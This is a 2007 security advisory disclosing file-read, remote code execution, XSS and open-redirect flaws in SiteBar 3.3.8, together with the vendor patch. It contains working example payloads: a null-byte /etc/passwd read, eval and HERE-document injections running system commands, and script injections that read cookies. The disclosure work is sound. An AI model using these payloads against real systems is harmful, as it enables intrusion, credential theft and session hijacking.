NDSA20071016.txt

`-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA1  
  
Nth Dimension Security Advisory (NDSA20071016)  
Date: 16th October 2007  
Author: Tim Brown <mailto:[email protected]>  
URL: <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>  
Product: SiteBar 3.3.8 <http://www.sitebar.org/>  
Vendor: Ondřej Brablc, David Szego and SiteBar Team <http://www.sitebar.org/>  
Risk: High  
  
Summary  
  
This advisory comes in 4 related parts:  
  
1) SiteBar application has single high risk issues with its translation  
module. It can can be made to retrieve any file to which the web server user  
has read access.  
  
2) SiteBar application has multiple high risk issues with its translation  
module. It can be made to execute arbitrary code to gain remote access  
as the web server user typically nobody.  
  
3) SiteBar application has multiple medium risk issues where it is vulnerable  
to Javascript injection within the requested URL.  
  
4) SiteBar application has single medium risk issue where it is vulnerable to  
malicious redirects within the requested URL.  
  
Technical Details  
  
1) The SiteBar application translation module can be made to read any  
arbitrary file that the web server user has read access to, as it makes  
no sanity checks on the value passed within the dir parameter of the URL,  
for example:  
  
http://192.168.1.1/translator.php?dir=/etc/passwd%00  
  
Note the use of %00 to terminate the malicious and so prevent the intended  
string concatenation occuring.  
  
2) The SiteBar application translation module can be forced into code  
execution can occur in one of two ways. Firstly, it makes no sanity checks  
on the value passed within the edit parameter prior to using the value as  
part of an eval() call, for example:  
  
http://192.168.1.1/translator.php?lang=zh_CN&cmd=upd&edit=$GET[%22lang%22];system(%22uname%20-a%22);  
  
Secondly, whilst modifying strings within a translation, it makes no sanity  
checks on the value passed for a given string to be embedded within a HERE  
document within the languages strings library. It is therefore possible to  
terminate the HERE document and pass arbitrary code which will be executed  
whenever the languages strings library is included, for example:  
  
POST http://192.168.1.1/translator.php?lang=test&edit=text HTTP/1.1  
Host: 192.168.1.1  
Referer: http://192.168.1.1/translator.php?lang=test&edit=text  
Cookie: SB3COOKIE=1; SB3AUTH=3efab8d1dc9a149d7d1d7866a33d2539  
Content-Type: application/x-www-form-urlencoded  
Content-length: 47497  
  
dir=&label%5B0%5D=The+Bookmark+Server+for+Personal+and+Team+Use&md5%5B0%5D=823084516ae27478ec4c5fd40fb32ea8&value%5B0%5D=_P;  
  
system('id');  
  
?>  
  
Note that _P terminates the HERE document.  
  
3) The values of the URL requested are used in within the web pages returned  
by the various scripts, in their unsanitised form. Specifically, it makes  
no sanity checks on the value passed within the multiple parameters of the  
URL, for example:  
  
http://192.168.1.1/integrator.php?lang="><script>alert('xss')</script> - Allows '  
http://192.168.1.1/command.php?command=New+Password&uid=&token="><script>alert(document.cookie)</script> - Does not allow '  
http://192.168.1.1/command.php?command=Folder%20Properties&nid_acl=%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '  
http://192.168.1.1/index.php?target=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow '  
http://192.168.1.1/command.php?command='%3Cscript%3Ealert(document.cookie)%3C/script%3E - Does not allow ', this one turned out to be CVE-2006-3320.  
http://192.168.1.1/command.php?command=Modify%20User&uid=%22%3E%3Cscript%3Ealert('xss')%3C/script%3E - Allows '  
  
Note that CVE-2006-3320 had not been resolved at the time of testing, in  
September 2007, and so we included it in our vulnerability report to the vendor  
for completeness.  
  
4) Finally, the SiteBar can be made to redirect users to malicious locations,  
as it makes no checks on the value passed within the forward parameter of the URL,  
for example:  
  
http://192.168.1.1/command.php?command=Log%20In&forward=http://www.google.com/  
  
Solutions  
  
Following vendor notification on the 27th September 2007, the vendor promptly  
responded with an initial patch on the 7th October which has been attached along  
with this advisory and which resolved the reported issues. Nth Dimension would  
recommend applying this patch as soon as possible. Alternatively, from 3.3.9  
(available at http://sitebar.org/downloads.php) onwards also include this patch.  
Nth Dimension would like to thank Ondraj from the SiteBar team for the way he  
worked to resolve the issue.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1.4.6 (GNU/Linux)  
  
iD8DBQFHFo3OVAlO5exu9x8RAhLWAJ0Vw4cessVBHnFMswYp6aDlmriDnwCfXpil  
wyDF4P/iRQ5Ab7FqJFutWBA=  
=Oqb/  
-----END PGP SIGNATURE-----  
`